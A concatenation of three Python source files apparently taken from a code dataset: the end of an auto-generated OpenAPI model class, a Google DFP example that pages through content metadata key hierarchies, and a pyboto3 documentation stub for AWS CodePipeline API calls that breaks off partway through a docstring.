Identifier To Non Currency| | | <a name=\"403\">403</a>|Currency Instrument Cannot Be Deleted| | | <a name=\"404\">404</a>|Currency Instrument Cannot Have Economic Definition| | | <a name=\"405\">405</a>|Currency Instrument Cannot Have Lookthrough Portfolio| | | <a name=\"406\">406</a>|Cannot Create Currency Instrument With Multiple Identifiers| | | <a name=\"407\">407</a>|Specified Currency Is Undefined| | | <a 
name=\"410\">410</a>|Index Does Not Exist| | | <a name=\"411\">411</a>|Sort Field Does Not Exist| | | <a name=\"413\">413</a>|Negative Pagination Parameters| | | <a name=\"414\">414</a>|Invalid Search Syntax| | | <a name=\"415\">415</a>|Filter Execution Timeout| | | <a name=\"420\">420</a>|Side Definition Inconsistent| | | <a name=\"450\">450</a>|Invalid Quote Access Metadata Rule| | | <a name=\"451\">451</a>|Access Metadata Not Found| | | <a name=\"452\">452</a>|Invalid Access Metadata Identifier| | | <a name=\"460\">460</a>|Standard Resource Not Found| | | <a name=\"461\">461</a>|Standard Resource Conflict| | | <a name=\"462\">462</a>|Calendar Not Found| | | <a name=\"463\">463</a>|Date In A Calendar Not Found| | | <a name=\"464\">464</a>|Invalid Date Source Data| | | <a name=\"465\">465</a>|Invalid Timezone| | | <a name=\"601\">601</a>|Person Identifier Already In Use| | | <a name=\"602\">602</a>|Person Not Found| | | <a name=\"603\">603</a>|Cannot Set Identifier| | | <a name=\"617\">617</a>|Invalid Recipe Specification In Request| | | <a name=\"618\">618</a>|Inline Recipe Deserialisation Failure| | | <a name=\"619\">619</a>|Identifier Types Not Set For Entity| | | <a name=\"620\">620</a>|Cannot Delete All Client Defined Identifiers| | | <a name=\"650\">650</a>|The Order requested was not found.| | | <a name=\"654\">654</a>|The Allocation requested was not found.| | | <a name=\"655\">655</a>|Cannot build the fx forward target with the given holdings.| | | <a name=\"656\">656</a>|Group does not contain expected entities.| | | <a name=\"667\">667</a>|Relation definition already exists| | | <a name=\"673\">673</a>|Missing entitlements for entities in Group| | | <a name=\"674\">674</a>|Next Best Action not found| | | <a name=\"676\">676</a>|Relation definition not defined| | | <a name=\"677\">677</a>|Invalid entity identifier for relation| | | <a name=\"681\">681</a>|Sorting by specified field not supported|One or more of the provided fields to order by were either 
invalid or not supported. | | <a name=\"682\">682</a>|Too many fields to sort by|The number of fields to sort the data by exceeds the number allowed by the endpoint | | <a name=\"684\">684</a>|Sequence Not Found| | | <a name=\"685\">685</a>|Sequence Already Exists| | | <a name=\"686\">686</a>|Non-cycling sequence has been exhausted| | | <a name=\"687\">687</a>|Legal Entity Identifier Already In Use| | | <a name=\"688\">688</a>|Legal Entity Not Found| | | <a name=\"689\">689</a>|The supplied pagination token is invalid| | | <a name=\"690\">690</a>|Property Type Is Not Supported| | | <a name=\"691\">691</a>|Multiple Tax-lots For Currency Type Is Not Supported| | # noqa: E501
The version of the OpenAPI document: 0.11.2220
Contact: info@finbourne.com
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
class UpdatePropertyDefinitionRequest(object):
    """NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech

    Do not edit the class manually.
    """
    """
    Attributes:
      openapi_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
      required_map (dict): The key is attribute name
                           and the value is whether it is 'required' or 'optional'.
    """
    # Attribute name -> OpenAPI type of the attribute.
    openapi_types = {
        'display_name': 'str',
        'property_description': 'str'
    }

    # Attribute name -> key used for the attribute in the JSON body.
    attribute_map = {
        'display_name': 'displayName',
        'property_description': 'propertyDescription'
    }

    # Attribute name -> whether the attribute is 'required' or 'optional'.
    required_map = {
        'display_name': 'required',
        'property_description': 'optional'
    }

    def __init__(self, display_name=None, property_description=None):  # noqa: E501
        """
        UpdatePropertyDefinitionRequest - a model defined in OpenAPI

        :param display_name: The display name of the property. (required)
        :type display_name: str
        :param property_description: Describes the property
        :type property_description: str
        """  # noqa: E501

        self._display_name = None
        self._property_description = None
        self.discriminator = None

        # Assign through the property setters so validation runs.
        self.display_name = display_name
        self.property_description = property_description

    @property
    def display_name(self):
        """Gets the display_name of this UpdatePropertyDefinitionRequest.

        The display name of the property.

        :return: The display_name of this UpdatePropertyDefinitionRequest.
        :rtype: str
        """
        return self._display_name

    @display_name.setter
    def display_name(self, display_name):
        """Sets the display_name of this UpdatePropertyDefinitionRequest.

        The display name of the property.

        :param display_name: The display_name of this UpdatePropertyDefinitionRequest.
        :type: str
        """
        # display_name is a required field; reject None explicitly.
        if display_name is None:
            raise ValueError("Invalid value for `display_name`, must not be `None`")  # noqa: E501
        self._display_name = display_name

    @property
    def property_description(self):
        """Gets the property_description of this UpdatePropertyDefinitionRequest.

        Describes the property

        :return: The property_description of this UpdatePropertyDefinitionRequest.
        :rtype: str
        """
        return self._property_description

    @property_description.setter
    def property_description(self, property_description):
        """Sets the property_description of this UpdatePropertyDefinitionRequest.

        Describes the property

        :param property_description: The property_description of this UpdatePropertyDefinitionRequest.
        :type: str
        """
        # The API limits the description to at most 100 characters.
        if property_description is not None and len(property_description) > 100:
            raise ValueError("Invalid value for `property_description`, length must be less than or equal to `100`")  # noqa: E501
        self._property_description = property_description

    def to_dict(self):
        """Returns the model properties as a dict"""
        def _serialize(value):
            # Recursively convert nested model objects via their to_dict().
            if isinstance(value, list):
                return [item.to_dict() if hasattr(item, "to_dict") else item
                        for item in value]
            if hasattr(value, "to_dict"):
                return value.to_dict()
            if isinstance(value, dict):
                return {key: (val.to_dict() if hasattr(val, "to_dict") else val)
                        for key, val in value.items()}
            return value

        return {name: _serialize(getattr(self, name))
                for name in self.openapi_types}

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        return (isinstance(other, UpdatePropertyDefinitionRequest)
                and self.__dict__ == other.__dict__)

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
| 209.1 | 28,439 | 0.690638 |
795c7f0cfc73a36d9db7b8e35933a25d8690cb36 | 2,038 | py | Python | examples/dfp/v201611/content_metadata_key_hierarchy_service/get_all_content_metadata_key_hierarchies.py | agencia-watermelons/googleads-python-lib | d2e55863ecf7e5090c225d74b3f4c1f948cd5a21 | [
"Apache-2.0"
] | null | null | null | examples/dfp/v201611/content_metadata_key_hierarchy_service/get_all_content_metadata_key_hierarchies.py | agencia-watermelons/googleads-python-lib | d2e55863ecf7e5090c225d74b3f4c1f948cd5a21 | [
"Apache-2.0"
] | null | null | null | examples/dfp/v201611/content_metadata_key_hierarchy_service/get_all_content_metadata_key_hierarchies.py | agencia-watermelons/googleads-python-lib | d2e55863ecf7e5090c225d74b3f4c1f948cd5a21 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
#
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This example gets all content metadata key hierarchies.
"""
# Import appropriate modules from the client library.
from googleads import dfp
def main(client):
  """Fetches and prints all content metadata key hierarchies.

  Pages through the ContentMetadataKeyHierarchyService results until every
  hierarchy in the network has been printed.

  Args:
    client: an initialized googleads.dfp.DfpClient instance.
  """
  # Initialize appropriate service.
  content_metadata_key_hierarchy_service = client.GetService(
      'ContentMetadataKeyHierarchyService', version='v201611')

  # Create a statement to select content metadata key hierarchies.
  statement = dfp.FilterStatement()

  # Retrieve a small amount of content metadata key hierarchies at a time,
  # paging through until all content metadata key hierarchies have been
  # retrieved.
  while True:
    response = (
        content_metadata_key_hierarchy_service
        .getContentMetadataKeyHierarchiesByStatement(
            statement.ToStatement()))
    if 'results' in response:
      for content_metadata_key_hierarchy in response['results']:
        # Print out some information for each content metadata key hierarchy.
        print('Content metadata key hierarchy with ID "%d" and name "%s" was '
              'found.\n' % (content_metadata_key_hierarchy['id'],
                            content_metadata_key_hierarchy['name']))
      statement.offset += dfp.SUGGESTED_PAGE_LIMIT
    else:
      break

  # Bug fix: this was a Python 2 print *statement*, which is a SyntaxError
  # under Python 3 and inconsistent with the print() calls above.
  print('\nNumber of results found: %s' % response['totalResultSetSize'])
if __name__ == '__main__':
  # Initialize client object from stored configuration.
  # NOTE(review): LoadFromStorage presumably reads the googleads.yaml
  # credentials file -- confirm against the googleads library docs.
  dfp_client = dfp.DfpClient.LoadFromStorage()
  main(dfp_client)
| 36.392857 | 78 | 0.728656 |
795c7ffcd8f783bf2f39a42165e9c46e1ce5446a | 69,136 | py | Python | pyboto3/codepipeline.py | thecraftman/pyboto3 | 653a0db2b00b06708334431da8f169d1f7c7734f | [
"MIT"
] | null | null | null | pyboto3/codepipeline.py | thecraftman/pyboto3 | 653a0db2b00b06708334431da8f169d1f7c7734f | [
"MIT"
] | null | null | null | pyboto3/codepipeline.py | thecraftman/pyboto3 | 653a0db2b00b06708334431da8f169d1f7c7734f | [
"MIT"
] | null | null | null | '''
The MIT License (MIT)
Copyright (c) 2016 WavyCloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def acknowledge_job(jobId=None, nonce=None):
    """
    Confirms receipt of a specified job by the job worker. Used only for
    custom actions.
    See also: AWS API Documentation

    :example: response = client.acknowledge_job(
        jobId='string',
        nonce='string'
    )

    :type jobId: string
    :param jobId: [REQUIRED]
        The unique system-generated ID of the job for which receipt is being
        confirmed.

    :type nonce: string
    :param nonce: [REQUIRED]
        A system-generated random number that AWS CodePipeline uses to ensure
        the job is being worked on by only one job worker. Obtain this number
        from the response of the PollForJobs request that returned this job.

    :rtype: dict
    :return: {
        'status': 'Created'|'Queued'|'Dispatched'|'InProgress'|'TimedOut'|'Succeeded'|'Failed'
    }
    """
    pass
def acknowledge_third_party_job(jobId=None, nonce=None, clientToken=None):
    """
    Confirms that a job worker has received the specified job. Used only for
    partner actions.
    See also: AWS API Documentation

    :example: response = client.acknowledge_third_party_job(
        jobId='string',
        nonce='string',
        clientToken='string'
    )

    :type jobId: string
    :param jobId: [REQUIRED]
        The unique system-generated ID of the job.

    :type nonce: string
    :param nonce: [REQUIRED]
        A system-generated random number that AWS CodePipeline uses to ensure
        the job is being worked on by only one job worker. Obtain this number
        from the response to a GetThirdPartyJobDetails request.

    :type clientToken: string
    :param clientToken: [REQUIRED]
        The clientToken portion of the clientId and clientToken pair used to
        verify that the calling entity is allowed access to the job and its
        details.

    :rtype: dict
    :return: {
        'status': 'Created'|'Queued'|'Dispatched'|'InProgress'|'TimedOut'|'Succeeded'|'Failed'
    }
    """
    pass
def can_paginate(operation_name=None):
    """
    Check if an operation can be paginated.

    :type operation_name: string
    :param operation_name: The operation name, which is the same name as the
        corresponding client method. For example, if the method name is
        create_foo (normally invoked as client.create_foo(**kwargs)) and the
        create_foo operation can be paginated, you can use the call
        client.get_paginator('create_foo').
    """
    pass
def create_custom_action_type(category=None, provider=None, version=None, settings=None, configurationProperties=None, inputArtifactDetails=None, outputArtifactDetails=None):
    """
    Creates a new custom action that can be used in all pipelines associated
    with the AWS account. Used only for custom actions.
    See also: AWS API Documentation

    :type category: string
    :param category: [REQUIRED]
        The category of the custom action, such as a build action or a test
        action ('Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval').
        Although Source and Approval are listed as valid values, they are not
        currently functional and are reserved for future use.

    :type provider: string
    :param provider: [REQUIRED]
        The provider of the service used in the custom action, such as AWS
        CodeDeploy.

    :type version: string
    :param version: [REQUIRED]
        The version identifier of the custom action.

    :type settings: dict
    :param settings: Settings for the action type. Keys:
        thirdPartyConfigurationUrl (string) -- sign-up/initial-configuration
            page for the external service.
        entityUrlTemplate (string) -- deep link shown in the pipeline action
            display to the external system's resources.
        executionUrlTemplate (string) -- link to the top-level landing page
            of the external system, shown on the pipeline view page.
        revisionUrlTemplate (string) -- link to the page where customers can
            update or change the configuration of the external action.

    :type configurationProperties: list
    :param configurationProperties: The configuration properties for the
        custom action. Each entry is a dict with:
        name (string, REQUIRED), required (boolean, REQUIRED),
        key (boolean, REQUIRED), secret (boolean, REQUIRED),
        queryable (boolean), description (string), and
        type ('String'|'Number'|'Boolean').
        Secrets are hidden from all calls except GetJobDetails,
        GetThirdPartyJobDetails, PollForJobs, and PollForThirdPartyJobs.
        An action can have at most one queryable property; if present, that
        property must be both required and not secret, and its value must be
        at most twenty (20) characters consisting only of alphanumeric
        characters, underscores, and hyphens. Property names may be referenced
        in the URL templates using the format {Config:name} when the property
        is both required and not secret.

    :type inputArtifactDetails: dict
    :param inputArtifactDetails: [REQUIRED]
        Details of the input artifacts:
        minimumCount (integer, REQUIRED) and maximumCount (integer, REQUIRED)
        of artifacts allowed for the action type.

    :type outputArtifactDetails: dict
    :param outputArtifactDetails: [REQUIRED]
        Details of the output artifacts:
        minimumCount (integer, REQUIRED) and maximumCount (integer, REQUIRED)
        of artifacts allowed for the action type.

    :rtype: dict
    :return: {
        'actionType': {
            'id': {
                'category': 'Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
                'owner': 'AWS'|'ThirdParty'|'Custom',
                'provider': 'string',
                'version': 'string'
            },
            'settings': {
                'thirdPartyConfigurationUrl': 'string',
                'entityUrlTemplate': 'string',
                'executionUrlTemplate': 'string',
                'revisionUrlTemplate': 'string'
            },
            'actionConfigurationProperties': [
                {
                    'name': 'string',
                    'required': True|False,
                    'key': True|False,
                    'secret': True|False,
                    'queryable': True|False,
                    'description': 'string',
                    'type': 'String'|'Number'|'Boolean'
                },
            ],
            'inputArtifactDetails': {
                'minimumCount': 123,
                'maximumCount': 123
            },
            'outputArtifactDetails': {
                'minimumCount': 123,
                'maximumCount': 123
            }
        }
    }
    """
    pass
def create_pipeline(pipeline=None):
    """Create a new pipeline.

    See also: AWS API Documentation.

    :type pipeline: dict
    :param pipeline: [REQUIRED] The full pipeline declaration: the structure
        of stages and actions to be performed. Required keys:

        * ``name`` (string) -- the pipeline name.
        * ``roleArn`` (string) -- the ARN AWS CodePipeline assumes to perform
          actions (or to assume per-action roles when an action declares its
          own ``roleArn``).
        * ``artifactStore`` (dict) -- where pipeline artifacts are stored:
          ``type`` (``'S3'``), ``location`` (bucket/folder), and an optional
          ``encryptionKey`` dict (``id``, ``type`` -- must be ``'KMS'`` when
          creating or updating).
        * ``stages`` (list of dict) -- each stage has a ``name``, optional
          ``blockers`` (reserved for future use), and a required ``actions``
          list. Each action declares ``name``, ``actionTypeId`` (``category``,
          ``owner``, ``provider``, ``version``), and optionally ``runOrder``,
          ``configuration`` (string-to-string map), ``outputArtifacts``,
          ``inputArtifacts`` (input names must exactly match a preceding
          action's output names; output names must be unique within the
          pipeline), and a per-action ``roleArn``.

        ``version`` (integer) is managed by the service: a new pipeline is
        version 1 and the number is incremented automatically on update.

    :rtype: dict
    :return: ``{'pipeline': {...}}`` -- the pipeline structure as created,
        echoing the declaration above with its assigned ``version``.
    """
    pass
def delete_custom_action_type(category=None, provider=None, version=None):
    """Mark a custom action as deleted.

    After the action is marked for deletion, PollForJobs for that custom
    action will fail. Only used for custom actions.

    See also: AWS API Documentation.

    :type category: string
    :param category: [REQUIRED] The category of the custom action to delete,
        such as source or deploy.
    :type provider: string
    :param provider: [REQUIRED] The provider of the service used in the
        custom action, such as AWS CodeDeploy.
    :type version: string
    :param version: [REQUIRED] The version of the custom action to delete.
    """
    pass
def delete_pipeline(name=None):
    """Delete the specified pipeline.

    See also: AWS API Documentation.

    :type name: string
    :param name: [REQUIRED] The name of the pipeline to be deleted.
    """
    pass
def disable_stage_transition(pipelineName=None, stageName=None, transitionType=None, reason=None):
    """Prevent artifacts in a pipeline from transitioning to the next stage.

    See also: AWS API Documentation.

    :type pipelineName: string
    :param pipelineName: [REQUIRED] The pipeline in which to disable the flow
        of artifacts from one stage to another.
    :type stageName: string
    :param stageName: [REQUIRED] The stage whose inbound or outbound artifact
        transition should be disabled.
    :type transitionType: string
    :param transitionType: [REQUIRED] ``'Inbound'`` to keep artifacts from
        entering the stage and being processed by its actions, or
        ``'Outbound'`` to keep already-processed artifacts from leaving it.
    :type reason: string
    :param reason: [REQUIRED] The reason shown to users for the disabled
        stage (for example, waiting for manual approval or manual tests);
        displayed in the pipeline console UI.
    """
    pass
def enable_stage_transition(pipelineName=None, stageName=None, transitionType=None):
    """Enable artifacts in a pipeline to transition to a stage.

    See also: AWS API Documentation.

    :type pipelineName: string
    :param pipelineName: [REQUIRED] The pipeline in which to enable the flow
        of artifacts from one stage to another.
    :type stageName: string
    :param stageName: [REQUIRED] The stage for which to enable the artifact
        transition, either into the stage (inbound) or from it to the next
        stage (outbound).
    :type transitionType: string
    :param transitionType: [REQUIRED] ``'Inbound'`` to allow artifacts to
        enter the stage and be processed by its actions, or ``'Outbound'``
        to allow already-processed artifacts to move to the next stage.
    """
    pass
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
    """Generate a presigned URL given a client, its method, and arguments.

    :type ClientMethod: string
    :param ClientMethod: The client method to presign for.
    :type Params: dict
    :param Params: The parameters normally passed to ``ClientMethod``.
    :type ExpiresIn: int
    :param ExpiresIn: How many seconds the presigned URL stays valid.
        Defaults to one hour (3600 seconds).
    :type HttpMethod: string
    :param HttpMethod: The HTTP method to use on the generated URL. By
        default, whatever method the operation's model uses.
    """
    pass
def get_job_details(jobId=None):
    """Return information about a job. Only used for custom actions.

    See also: AWS API Documentation.

    :type jobId: string
    :param jobId: [REQUIRED] The unique system-generated ID for the job.

    :rtype: dict
    :return: ``{'jobDetails': {...}}`` containing the job ``id``, the AWS
        account ``accountId``, and a ``data`` dict with:

        * ``actionTypeId`` -- ``category``, ``owner``, ``provider``,
          ``version`` of the action.
        * ``actionConfiguration`` -- the action's ``configuration`` map.
        * ``pipelineContext`` -- ``pipelineName`` plus the ``stage`` and
          ``action`` names.
        * ``inputArtifacts`` / ``outputArtifacts`` -- lists of artifacts,
          each with ``name``, ``revision``, and an S3 ``location``
          (``bucketName``, ``objectKey``).
        * ``artifactCredentials`` -- temporary ``accessKeyId``,
          ``secretAccessKey``, and ``sessionToken`` for artifact access.
        * ``continuationToken`` -- token identifying an in-progress custom
          action run, if any.
        * ``encryptionKey`` -- the KMS key (``id``, ``type``) used for the
          artifact store, if defined.
    """
    pass
def get_paginator(operation_name=None):
    """Create a paginator for an operation.

    :type operation_name: string
    :param operation_name: The operation name, identical to the client's
        method name. For example, if the method is ``create_foo`` (normally
        invoked as ``client.create_foo(**kwargs)``) and it supports
        pagination, call ``client.get_paginator('create_foo')``.
    :rtype: L{botocore.paginate.Paginator}
    """
    pass
def get_pipeline(name=None, version=None):
    """Return the metadata, structure, stages, and actions of a pipeline.

    The result is the entire pipeline structure in JSON form, which can be
    modified and then used to update the pipeline with UpdatePipeline.

    See also: AWS API Documentation.

    :type name: string
    :param name: [REQUIRED] The name of the pipeline to describe. Pipeline
        names must be unique within an AWS user account.
    :type version: integer
    :param version: The pipeline version number. Defaults to the most
        current version when omitted.

    :rtype: dict
    :return: ``{'pipeline': {...}}`` -- the full pipeline declaration:
        ``name``, ``roleArn``, ``artifactStore`` (S3 ``type``/``location``
        and optional KMS ``encryptionKey``), the ``stages`` list (each with
        ``name``, ``blockers``, and ``actions`` carrying ``actionTypeId``,
        ``runOrder``, ``configuration``, ``inputArtifacts``,
        ``outputArtifacts``, and optional ``roleArn``), and the pipeline
        ``version``.
    """
    pass
def get_pipeline_execution(pipelineName=None, pipelineExecutionId=None):
    """Return details about one execution of a pipeline.

    Includes artifact details, the pipeline execution ID, and the pipeline's
    name, version, and status.

    See also: AWS API Documentation.

    :type pipelineName: string
    :param pipelineName: [REQUIRED] The pipeline whose execution details are
        requested.
    :type pipelineExecutionId: string
    :param pipelineExecutionId: [REQUIRED] The ID of the pipeline execution
        to describe.

    :rtype: dict
    :return: ``{'pipelineExecution': {...}}`` with ``pipelineName``,
        ``pipelineVersion``, ``pipelineExecutionId``, ``status``, and an
        ``artifactRevisions`` list (each revision has ``name``,
        ``revisionId``, ``revisionChangeIdentifier``, ``revisionSummary``,
        ``created``, and ``revisionUrl``). Status values:

        * ``InProgress`` -- the execution is currently running.
        * ``Succeeded`` -- the execution completed successfully.
        * ``Superseded`` -- while waiting for the next stage, a newer
          execution caught up and continued through the pipeline instead.
        * ``Failed`` -- the pipeline did not complete successfully.
    """
    pass
def get_pipeline_state(name=None):
    """Return the state of a pipeline, including its stages and actions.

    See also: AWS API Documentation.

    :type name: string
    :param name: [REQUIRED] The name of the pipeline to describe.

    :rtype: dict
    :return: A dict with ``pipelineName``, ``pipelineVersion``, ``created``,
        ``updated``, and a ``stageStates`` list. Each stage state carries:

        * ``stageName``.
        * ``inboundTransitionState`` -- ``enabled``, ``lastChangedBy``,
          ``lastChangedAt``, and ``disabledReason``.
        * ``actionStates`` -- per-action ``actionName``, ``currentRevision``
          (``revisionId``, ``revisionChangeId``, ``created``),
          ``latestExecution`` (``status``, ``summary``,
          ``lastStatusChange``, ``token``, ``lastUpdatedBy``,
          ``externalExecutionId``, ``externalExecutionUrl``,
          ``percentComplete``, and ``errorDetails`` with ``code`` and
          ``message``), plus ``entityUrl`` and ``revisionUrl``.
        * ``latestExecution`` -- the stage's most recent
          ``pipelineExecutionId`` and ``status``.
    """
    pass
def get_third_party_job_details(jobId=None, clientToken=None):
    """Request the details of a third-party action's job.

    Only used for partner actions.

    See also: AWS API Documentation.

    :type jobId: string
    :param jobId: [REQUIRED] The unique system-generated ID identifying the
        job.
    :type clientToken: string
    :param clientToken: [REQUIRED] The clientToken portion of the
        clientId/clientToken pair used to verify that the caller is allowed
        access to the job and its details.

    :rtype: dict
    :return: ``{'jobDetails': {...}}`` with the job ``id``, a ``nonce``, and
        a ``data`` dict containing ``actionTypeId``, ``actionConfiguration``,
        ``pipelineContext`` (pipeline/stage/action names),
        ``inputArtifacts`` and ``outputArtifacts`` (each artifact with
        ``name``, ``revision``, and an S3 ``location``),
        ``artifactCredentials`` (temporary AWS credentials),
        ``continuationToken``, and the artifact-store ``encryptionKey``.
    """
    pass
def get_waiter():
    """Return a waiter for this client (no waiters are defined)."""
    pass
def list_action_types(actionOwnerFilter=None, nextToken=None):
    """Summarize all AWS CodePipeline action types for your account.

    See also: AWS API Documentation.

    :type actionOwnerFilter: string
    :param actionOwnerFilter: Restrict the list to action types created by a
        specific entity (``'AWS'``, ``'ThirdParty'``, or ``'Custom'``).
    :type nextToken: string
    :param nextToken: An identifier returned by a previous list-action-types
        call; pass it to fetch the next page of results.

    :rtype: dict
    :return: A dict with an ``actionTypes`` list and a ``nextToken`` string.
        Each action type describes:

        * ``id`` -- ``category``, ``owner``, ``provider``, ``version``.
        * ``settings`` -- ``thirdPartyConfigurationUrl``,
          ``entityUrlTemplate``, ``executionUrlTemplate``, and
          ``revisionUrlTemplate``.
        * ``actionConfigurationProperties`` -- each with ``name``,
          ``required``, ``key``, ``secret``, ``queryable``, ``description``,
          and ``type``.
        * ``inputArtifactDetails`` / ``outputArtifactDetails`` --
          ``minimumCount`` and ``maximumCount`` of artifacts allowed.
    """
    pass
def list_pipelines(nextToken=None):
    """Summarize all of the pipelines associated with your account.

    See also: AWS API Documentation.

    :type nextToken: string
    :param nextToken: An identifier returned by a previous list-pipelines
        call; pass it to fetch the next page of results.

    :rtype: dict
    :return: A dict with a ``pipelines`` list (each entry has ``name``,
        ``version``, ``created``, and ``updated``) and a ``nextToken``
        string for pagination.
    """
    pass
def poll_for_jobs(actionTypeId=None, maxBatchSize=None, queryParam=None):
    """Return information about any jobs for AWS CodePipeline to act upon.

    See also: AWS API Documentation.

    :type actionTypeId: dict
    :param actionTypeId: [REQUIRED] Identifies the action type to poll for:

        * ``category`` (string) -- [REQUIRED] the kind of action that can be
          taken in the stage; constrains the provider type.
        * ``owner`` (string) -- [REQUIRED] the creator of the action.
        * ``provider`` (string) -- [REQUIRED] the service provider for the
          action (for example ``CodeDeploy`` for a Deploy-category action).
        * ``version`` (string) -- [REQUIRED] identifies the action type.
    :type maxBatchSize: integer
    :param maxBatchSize: The maximum number of jobs returned per poll.
    :type queryParam: dict
    :param queryParam: A map of property names to values. Must be null or
        empty for action types with no queryable properties; for an action
        type with a queryable property, supply that property as a key and
        only jobs whose action configuration matches the mapped value are
        returned.

    :rtype: dict
    :return: ``{'jobs': [...]}``. Each job has an ``id``, ``nonce``,
        ``accountId``, and a ``data`` dict with ``actionTypeId``,
        ``actionConfiguration``, ``pipelineContext``, ``inputArtifacts``,
        ``outputArtifacts`` (artifacts carry ``name``, ``revision``, and an
        S3 ``location``), ``artifactCredentials``, ``continuationToken``,
        and ``encryptionKey``.
    """
    pass
def poll_for_third_party_jobs(actionTypeId=None, maxBatchSize=None):
    """Check whether any third-party jobs exist for a job worker to act on.

    Only used for partner actions.

    See also: AWS API Documentation.

    :type actionTypeId: dict
    :param actionTypeId: [REQUIRED] Identifies the action type to poll for:

        * ``category`` (string) -- [REQUIRED] the kind of action that can be
          taken in the stage; constrains the provider type.
        * ``owner`` (string) -- [REQUIRED] the creator of the action.
        * ``provider`` (string) -- [REQUIRED] the service provider for the
          action (for example ``CodeDeploy`` for a Deploy-category action).
        * ``version`` (string) -- [REQUIRED] identifies the action type.
    :type maxBatchSize: integer
    :param maxBatchSize: The maximum number of jobs returned per poll.

    :rtype: dict
    :return: ``{'jobs': [...]}`` -- each job carries a ``clientId`` and a
        ``jobId``.
    """
    pass
def put_action_revision(pipelineName=None, stageName=None, actionName=None, actionRevision=None):
    """Tell AWS CodePipeline about new revisions to a source.

    See also: AWS API Documentation.

    :type pipelineName: string
    :param pipelineName: [REQUIRED] The pipeline that will start processing
        the source revision.
    :type stageName: string
    :param stageName: [REQUIRED] The stage containing the action that will
        act upon the revision.
    :type actionName: string
    :param actionName: [REQUIRED] The action that will process the revision.
    :type actionRevision: dict
    :param actionRevision: [REQUIRED] The action's version (revision)
        information:

        * ``revisionId`` (string) -- [REQUIRED] system-generated unique ID
          of the action's revision number.
        * ``revisionChangeId`` (string) -- [REQUIRED] unique identifier of
          the change that set this revision, such as a deployment ID or
          timestamp.
        * ``created`` (datetime) -- [REQUIRED] when the most recent version
          of the action was created, in timestamp format.

    :rtype: dict
    :return: ``{'newRevision': True|False, 'pipelineExecutionId': 'string'}``
    """
    pass
def put_approval_result(pipelineName=None, stageName=None, actionName=None, result=None, token=None):
    """Respond to a manual approval request in AWS CodePipeline.

    Valid responses are Approved and Rejected.

    See also: AWS API Documentation.

    :type pipelineName: string
    :param pipelineName: [REQUIRED] The pipeline containing the action.
    :type stageName: string
    :param stageName: [REQUIRED] The stage containing the action.
    :type actionName: string
    :param actionName: [REQUIRED] The action for which approval is requested.
    :type result: dict
    :param result: [REQUIRED] The approval response:

        * ``summary`` (string) -- [REQUIRED] summary of the current status
          of the approval request.
        * ``status`` (string) -- [REQUIRED] the reviewer's response,
          ``'Approved'`` or ``'Rejected'``.
    :type token: string
    :param token: [REQUIRED] The system-generated token identifying a unique
        approval request. Obtain it for each open request via
        GetPipelineState; it validates that the request corresponding to
        this token is still valid.

    :rtype: dict
    :return: ``{'approvedAt': datetime(...)}``
    """
    pass
def put_job_failure_result(jobId=None, failureDetails=None):
    """Report a job failure back to the pipeline from a job worker.

    Only used for custom actions.

    See also: AWS API Documentation.

    :type jobId: string
    :param jobId: [REQUIRED] The unique system-generated ID of the failed
        job; the same ID returned from PollForJobs.
    :type failureDetails: dict
    :param failureDetails: [REQUIRED] Details about the job failure:

        * ``type`` (string) -- [REQUIRED] the failure type.
        * ``message`` (string) -- [REQUIRED] the failure message.
        * ``externalExecutionId`` (string) -- external ID of the failed
          action run.
    """
    pass
def put_job_success_result(jobId=None, currentRevision=None, continuationToken=None, executionDetails=None):
    """Report a job success back to the pipeline from a job worker.

    Only used for custom actions.

    See also: AWS API Documentation.

    :type jobId: string
    :param jobId: [REQUIRED] The unique system-generated ID of the job that
        succeeded; the same ID returned from PollForJobs.
    :type currentRevision: dict
    :param currentRevision: The ID of the current revision of the artifact
        the job worked upon:

        * ``revision`` (string) -- [REQUIRED] revision ID of the current
          artifact version.
        * ``changeIdentifier`` (string) -- [REQUIRED] change identifier for
          the current revision.
        * ``created`` (datetime) -- when the most recent revision of the
          artifact was created, in timestamp format.
        * ``revisionSummary`` (string) -- summary of the most recent
          revision.
    :type continuationToken: string
    :param continuationToken: A worker-generated token (for example an AWS
        CodeDeploy deployment ID) identifying a custom action in progress.
        Future jobs use it to identify the running instance of the action
        and to return progress information. Omit it once the action is
        complete.
    :type executionDetails: dict
    :param executionDetails: Execution details of the successful job:

